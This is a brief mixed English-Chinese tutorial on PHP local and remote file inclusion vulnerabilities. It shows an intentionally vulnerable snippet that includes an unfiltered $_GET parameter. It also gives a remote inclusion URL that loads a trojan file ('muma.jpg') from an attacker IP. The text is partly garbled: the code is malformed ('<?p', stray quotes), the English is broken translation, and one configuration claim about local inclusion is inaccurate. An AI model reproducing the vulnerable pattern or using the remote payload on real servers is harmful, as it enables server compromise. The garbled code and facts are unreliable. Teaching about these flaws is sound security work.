The file contains an overview of vulnerabilities and a demonstration of classification
Contains an introduction to the vulnerability
Inclusion operations, functions that are provided in most web languages, but PHP is too powerful and flexible for include files, so inclusion vulnerabilities often appear in the PHP language, which leads to an error status Many beginners believe that inclusion vulnerabilities only appear in the PHP language, but they do not know that inclusion vulnerabilities may occur in other languages. This is also an old saying: the more powerful the function, the more loopholes there are.
Reason for the vulnerability
包含漏洞不是语言的问题,而是人的思维问题
Four include file functions in PHP
include()
include_once()
require()
require_once()
做代码审计,应该着重找这几个函数
原因就是这几个函数的参数值都会当做php文件解析
PHP contains vulnerability classification
Locally contains LIF
即把函数后的参数修改成为服务器本地的文件
例如
main.php
<?p
include''$_GET[page]'';
?>
1.html
页面1
此时输入http://192.168.1.55:8080/include/main.php?page=1.html
就可以直接执行1.html了
注意配置文件php.ini需要allow_url_include=on 并且 magic_quotes_gpc=off
Remote inclusion
That is, the parameter after the function is modified to a file under the web site directory specified by the attacker, which is not necessarily the attacker's own site. Any site can
directly enter http://192.168.1.55:8080/include/main.php? page = Attacker IP / include / muma.jpg